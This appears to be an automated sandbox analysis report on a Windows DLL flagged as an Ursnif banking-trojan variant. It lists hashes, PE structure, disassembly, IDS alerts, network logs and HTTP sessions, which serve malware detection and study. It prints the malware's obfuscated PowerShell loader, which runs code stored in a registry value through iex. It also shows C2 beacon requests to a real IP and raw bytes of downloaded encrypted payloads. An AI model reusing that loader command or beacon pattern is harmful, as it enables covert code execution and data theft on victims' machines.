                      SHA-512:8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C
                      Malicious:false
                      Preview:.**********************..Windows PowerShell transcript start..Start time: 20220504162806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 506013 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6644..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220504162806..**********************..PS>new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.E

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.2386475978649285
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:xaj0e933Uv.dll
                      File size:442368
                      MD5:69e570a35f63ea12cbad7a10b25a6ea4
                      SHA1:f0ca60563eeb9098ad6133daa1fc48c3987437e2
                      SHA256:3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6
                      SHA512:85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca
                      SSDEEP:6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7
                      TLSH:D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706
                      File Content Preview:MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5......

                      File Icon

                      Icon Hash:9068eccc64f6e2ad

                      Static PE Info

                      General

                      Entrypoint:0x401430
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x411096D1 [Wed Aug 4 07:57:05 2004 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:0bedc9af0ed7cf2ba33cf662a24d448e

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      add ecx, FFFFFFFFh
                      call 00007F4F08B3F6FCh
                      pop eax
                      pop eax
                      mov dword ptr [00414544h], eax
                      mov edx, dword ptr [00414660h]
                      sub edx, 00005289h
                      call edx
                      ret
                      int3
                      push esi
                      mov eax, ebx
                      mov dword ptr [00414540h], eax
                      pop dword ptr [00414538h]
                      mov dword ptr [00414548h], ebp
                      mov dword ptr [0041453Ch], edi
                      sub dword ptr [00414548h], FFFFFFFCh
                      loop 00007F4F08B3F6A5h
                      mov dword ptr [ebp+00h], eax
                      nop
                      ret
                      lea ecx, ebx
                      pop es
                      mov ds, word ptr [ecx]
                      lodsb
                      lea ebp, dword ptr [ecx+6B2EEEC3h]
                      movsb
                      xchg eax, esi
                      xchg dword ptr [ebx], esp
                      shl byte ptr [C2100869h], 1
                      loopne 00007F4F08B3F698h
                      pop eax
                      or ecx, dword ptr [ebx-5F28A8CFh]
                      pop ebx
                      je 00007F4F08B3F716h
                      sbb dword ptr [esi], eax
                      sbb bh, dh
                      mov ebp, A52AB60Ah
                      xor al, F7h
                      sbb eax, 442A8BDAh
                      mov edx, 8289DCF1h
                      wait
                      sub byte ptr [eax-20h], dh
                      pop ecx
                      or esi, edi
                      xchg eax, esp
                      loop 00007F4F08B3F757h
                      xchg eax, edi
                      sti
                      cmp eax, 3B0AD66Fh
                      dec ebp
                      mov esp, E193F8C3h

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xdc180x8c.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x9f28.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x6c0000xf0c.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0xd0b00x38.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0xd0000xb0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x10000x1.text
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xb7100xc000False0.0735880533854data1.02187881889IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0xd0000x10730x2000False0.18017578125data3.71231531364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xf0000x79d00x6000False0.373657226562data6.02583875365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .crt0x170000x1dc8e0x1e000False0.988427734375data7.9815287954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .erloc0x350000x2ca4f0x2d000False0.988259548611data7.98122243943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .rsrc0x620000x9f280xa000False0.602783203125data6.51663069246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x6c0000x132e0x2000False0.219360351562data3.73577949218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_BITMAP0x623600x666dataEnglishUnited States
                      RT_ICON0x629c80x485dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                      RT_ICON0x672280x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544EnglishUnited States
                      RT_ICON0x697d00xea8dataEnglishUnited States
                      RT_ICON0x6a6780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                      RT_ICON0x6af200x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                      RT_DIALOG0x6b4880xb4dataEnglishUnited States
                      RT_DIALOG0x6b5400x120dataEnglishUnited States
                      RT_DIALOG0x6b6600x158dataEnglishUnited States
                      RT_DIALOG0x6b7b80x202dataEnglishUnited States
                      RT_DIALOG0x6b9c00xf8dataEnglishUnited States
                      RT_DIALOG0x6bab80xa0dataEnglishUnited States
                      RT_DIALOG0x6bb580xeedataEnglishUnited States
                      RT_GROUP_ICON0x6bc480x4cdataEnglishUnited States
                      RT_VERSION0x6bc980x290MS Windows COFF PA-RISC object fileEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllEraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak
                      OLEAUT32.dllGetRecordInfoFromTypeInfo, LoadTypeLibEx
                      USER32.dllDefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo
                      GDI32.dllExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment
                      ADVAPI32.dllEnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA
                      msvcrt.dllstrcoll, fgetwc, srand

                      Version Infos

                      DescriptionData
                      LegalCopyright A Company. All rights reserved.
                      InternalName
                      FileVersion1.0.0.0
                      CompanyNameA Company
                      ProductName
                      ProductVersion1.0.0.0
                      FileDescription
                      OriginalFilenamemyfile.exe
                      Translation0x0409 0x04b0

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      05/04/22-16:27:54.122082 05/04/22-16:27:54.122082TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                      05/04/22-16:27:53.231327 05/04/22-16:27:53.231327TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                      05/04/22-16:27:53.642851 05/04/22-16:27:53.642851TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976980192.168.2.4185.189.151.28
                      05/04/22-16:27:33.120656 05/04/22-16:27:33.120656TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976080192.168.2.413.107.43.16

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 4, 2022 16:27:53.212703943 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.229989052 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.230151892 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.231327057 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.248414040 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.534866095 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.534919977 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.534966946 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.534984112 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535002947 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535007954 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535043955 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535058022 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535069942 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535089970 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535105944 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535140991 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535150051 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535165071 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535206079 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535248995 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535300016 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535312891 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535350084 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535361052 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535375118 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535397053 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.535409927 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.535456896 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.552704096 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552772999 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552818060 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552848101 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552889109 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552930117 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.552931070 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.552967072 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.552967072 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553004980 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553009033 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553046942 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553076029 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553114891 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553153992 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553158045 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553183079 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553217888 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553225994 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553267956 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553271055 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553298950 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553302050 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553318024 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553338051 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553379059 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553400993 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553409100 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553436041 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553447008 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553486109 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553498030 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553514004 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553534031 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553555965 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553599119 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553606033 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553649902 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553690910 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553807020 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553848982 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553863049 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.553879023 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.553915977 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.554440975 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.554519892 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.570719004 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570779085 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570816994 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570862055 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570903063 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570933104 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.570971012 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571021080 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571029902 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571050882 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571090937 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571101904 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571151018 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571155071 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571188927 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571219921 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571260929 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571269035 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571300030 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571307898 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571341038 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571369886 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571386099 CEST4976980192.168.2.4185.189.151.28
                      May 4, 2022 16:27:53.571408033 CEST8049769185.189.151.28192.168.2.4
                      May 4, 2022 16:27:53.571448088 CEST8049769185.189.151.28192.168.2.4

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      May 4, 2022 16:27:33.081885099 CEST8.8.8.8192.168.2.40xd133No error (0)l-0007.l-dc-msedge.net13.107.43.16A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • 185.189.151.28

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449769185.189.151.2880C:\Windows\SysWOW64\rundll32.exe
                      TimestampkBytes transferredDirectionData
                      May 4, 2022 16:27:53.231327057 CEST1212OUTGET /drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:27:53.534866095 CEST1213INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 186001
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d697bd35.bin"
                      Data Raw: 90 fe 16 00 dd 20 a6 90 00 22 81 96 31 0c 06 ee 2c a0 48 f2 36 47 2b a8 1f 78 fb 84 fe 80 bc 68 83 a3 b0 1b 36 53 4b 75 0f a7 82 72 a1 41 e1 ff 47 06 9d 2a 90 8e 26 f8 83 6e 4c 7a ba 23 11 cb 7a c4 b5 76 5c eb 93 5b 14 3c c9 98 a5 e3 8b c6 36 cc 13 99 54 83 1a 4c 7b 46 49 91 17 ea 3b bb 0c 41 7e bf 1b 94 ad a3 32 05 aa 3b b0 4f 0c cb fc da 60 91 e2 bd 0d 03 9d 3c bd a2 dd d7 3f 0f 94 dc e3 06 b6 33 92 7e 82 88 84 01 f1 a2 02 d5 be cd 05 f8 80 06 a7 6e 5b 13 39 e7 33 43 f9 ee 65 41 c1 09 48 5c 39 3b 96 45 42 2c d6 0e 26 1b 0d 07 a7 4a 31 10 18 b4 36 c2 cb 88 ce 0e 68 30 dd c9 12 ff 5a 51 b6 1f 27 30 1a 25 a6 fb 5f b1 43 86 48 4a be 41 1d 15 20 30 a1 22 5a 46 58 f9 15 cc 69 9f 79 f8 78 b2 f1 f4 64 27 68 96 aa c1 73 d4 a7 58 3d ff ca 94 06 f9 ff 3e aa d1 00 6e c4 9d 6b 43 ac 0c 73 10 7f 0a 46 6d a9 74 29 b7 65 25 b5 77 93 76 25 7a b8 d9 0d 9c 83 ab 02 b1 78 eb 7b 8d 01 61 4d 6f 2e 0a da b3 c7 26 36 df 2a 95 d4 bf df d3 28 b1 c4 44 91 f7 ed 03 59 40 3e 4e f4 f3 2c 45 08 6c ca 1e 96 ba cc 33 c6 d6 79 6e fe fc 1f 27 b2 8a 2c 3c 8b e3 b4 14 90 a6 c2 99 62 62 09 88 68 9b e5 5d 5a 1b 90 23 e3 3f 1e 37 65 79 84 54 e6 fa 2d 39 d0 ab 72 5f 30 51 17 b6 8d 50 6c f0 28 5a 7e 77 5d 4f e7 c7 d6 f5 10 1c e5 da 36 7b 84 8e 94 d4 b7 df fa ab aa 17 53 ac e3 5b b0 72 c2 c8 65 0a a1 68 34 7f bd db 5d 00 76 de 42 e5 35 53 61 1f b2 46 e4 5d b5 7e a8 1e 4b 28 b7 9d 61 42 3c ec 8f ef c7 31 1c 8f 4c 68 8c 93 db e0 4b 86 ff 36 5e 8b e5 b6 46 f3 43 2c c5 92 03 de c3 8a 33 76 52 de 17 e1 6a 06 82 43 9b 7d 58 a6 f9 59 d0 35 f8 22 ec 02 92 5f c2 94 98 f9 9c 96 72 7e 76 47 66 f2 a7 7b 29 58 64 8a b4 df fe fc 78 4c 1b 45 88 71 86 ab 44 26 65 5b 29 85 31 04 6f 88 9a 15 b6 69 e2 90 95 32 fe 62 fe a0 0f 8f 8d 27 8d d0 63 31 96 18 ad c3 68 6d 1c 70 e8 65 66 f8 3d 34 d6 fb 93 0e 68 95 ae 3f 77 85 3e f6 c2 fd bd a3 12 e3 f3 a6 45 7e 74 c5 8b 22 2b 46 9f b3 fb 84 39 cc c4 6e 5f 09 3e cf c2 0b 7a d8 1a a2 f7 8f d2 7c c9 c7 0a 86 fa 2f c2 c4 67 c1 14 c1 36 f4 7e ca 10 53 88 8f 87 0c 9a d8 40 02 b6 78 d9 3c 5d 0e 45 6d e7 1a 21 99 b0 29 1b e3 e0 c0 2b 02 47 bc 53 00 3c 8a 66 74 ca 12 c0 49 dc 75 43 18 6a 42 18 c7 9e 0b 55 fd 45 f0 5b 24 3a b5 3c 10 b5 a7 10 c7 28 d0 c7 35 3f 54 35 0e 43 41 1d bf f5 f3 9a f4 ff 81 26 48 fc 80 5f f1 f8 71 99 e4 0e 17 6a 1c 75 5d 64 95 f7 e1 88 a2 00 94 90 5f 6c d5 cd fc a5 72 b7 b6 e5 e8 5a 13 63 f5 4b b5 8e f2 82 41 64 7f ad 8e bd e9 6e 51 d0 ef ec 63 ab 78 09 ea e7 8c 71 e8 5b 12 a9 e1 0c 48 ed cb 06 da f3 7d ca 85 d7 45 2a 4b b1 c5 1c 9e 75 8e 33 0a 02 a8 57 71 0d b4 5c b3 46 dc 38 88 72 5b 66 00 55 4f 00 28 2c 61 67 7b 85 11 64 8c 84 de df 2f 2c 69 eb ba a7 86 a4 d1 ce df aa e3 93 48 d5 31 9a b5 8c e4 87 f9 e2 a0 e3 0c 04 b3 c4 40 f7 0f 35 de fc 0b d9 d3 2a 45 b4 91 93 26 51 19 8d f2 45 67 3b ed ed 42 e2 04 cd 3e 9c e7 c6 6f 15 1b aa 04 9e d3 e4 9f c4 7b 67 37 b7 40 48 05 e7 10 93 59 8a 81 f5 ca 77 22 e4 64 f5 a9 d5 0a 81 0e 53 8f c5 43 23 2d 3d 0f e4 a2 8a df c3 7b 13 3e 33 04 8c 56 2d 62 47 40 39 58 13 9c 69 1e b2 1f da 02 b7 59 0b d1 3e
                      Data Ascii: "1,H6G+xh6SKurAG*&nLz#zv\[<6TL{FI;A~2;O`<?3~n[93CeAH\9;EB,&J16h0ZQ'0%_CHJA 0"ZFXiyxd'hsX=>nkCsFmt)e%wv%zx{aMo.&6*(DY@>N,El3yn',<bbh]Z#?7eyT-9r_0QPl(Z~w]O6{S[reh4]vB5SaF]~K(aB<1LhK6^FC,3vRjC}XY5"_r~vGf{)XdxLEqD&e[)1oi2b'c1hmpef=4h?w>E~t"+F9n_>z|/g6~S@x<]Em!)+GS<ftIuCjBUE[$:<(5?T5CA&H_qju]d_lrZcKAdnQcxq[H}E*Ku3Wq\F8r[fUO(,ag{d/,iH1@5*E&QEg;B>o{g7@HYw"dSC#-={>3V-bG@9XiY>
                      May 4, 2022 16:27:53.642851114 CEST1410OUTGET /drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2BewmRx2tkooth41m1v2/ScpupYz0Zq373/g7DAOhtw/iFxPzO8lMv_2FTBIGbEpoxM/_2BCzEa_2F/P_2F_2BQrmvSKhVMj/GyG1jPMXpOEy/oR5Pq_2FkHh/PA1zCgDa0RmsjY/QkvATPynH2lMVaaST9iah/v7ORKI7orJRBYUn3/rdkm98ca_2BPJFG/T0_2BoDf88Xk4HDERX/d7f20yS8m/U9grT5w.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:27:53.934010029 CEST1411INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:53 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 238738
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d69e08bf.bin"
                      Data Raw: 3b 4c 6b f7 b7 25 70 03 88 2d 7a 37 9e a1 c8 64 0b d8 31 31 97 0f c5 b0 5f f3 81 6d 9e c3 45 83 0a 34 18 f9 2a 0e ff 72 ff c7 33 d5 29 5d 81 f6 a5 6c 33 59 c7 fc d9 7d 59 a6 2c 44 a0 08 b0 48 8b 5c 88 ed 4d 9c 4e f2 9c 04 cf da 87 8f fc 28 44 1b 1f d6 84 bb dc 53 47 f0 25 da f7 b6 56 48 26 5b 83 11 f9 80 79 d3 3f ab 3f 7b 8a 14 23 8f 4d 34 6e a5 8d 52 88 cb c6 51 bd 4e 27 49 d6 ba 33 30 b3 e5 52 76 59 f9 49 45 bb 09 82 03 75 7c e0 12 67 43 e1 33 8e b9 58 1e 5a b6 16 2b cf ae 0e 8d cd e6 c9 bb 31 32 9c b6 7f 38 ef b7 14 c5 6b 56 72 db db f5 20 42 b0 21 7b c2 d3 e4 6b fa b6 29 2f 63 6f 43 cf fd 33 d1 f1 f3 33 82 eb 56 90 92 b4 a4 9c 0b 34 10 8d ed df d7 30 79 ee 6a 70 e6 2e 5b 2f d9 bf ad 8c 81 5f ec d7 15 c8 85 f6 42 0f 37 b8 b0 93 ac a1 85 c4 23 5e e0 43 b2 f2 93 6a d4 39 18 f6 17 0d d7 36 b6 2c 4f 0e 34 06 73 fa a7 52 3b a0 32 82 5c f1 6b e4 7a 99 fc 8d 27 58 8a 96 1b 31 e8 14 ee 43 b7 d2 fb 67 09 cb 2e 03 64 ad e4 8a 6a 5f 40 27 ac a0 21 ac cd 7a c6 94 f3 0b 04 1c f4 15 03 a5 59 24 02 68 2c 35 6a 8b 51 d7 90 e5 d9 30 8a 7f dc c2 68 ae 3c 42 9a 5c 68 06 a5 c2 c4 6e 0f ef 64 32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 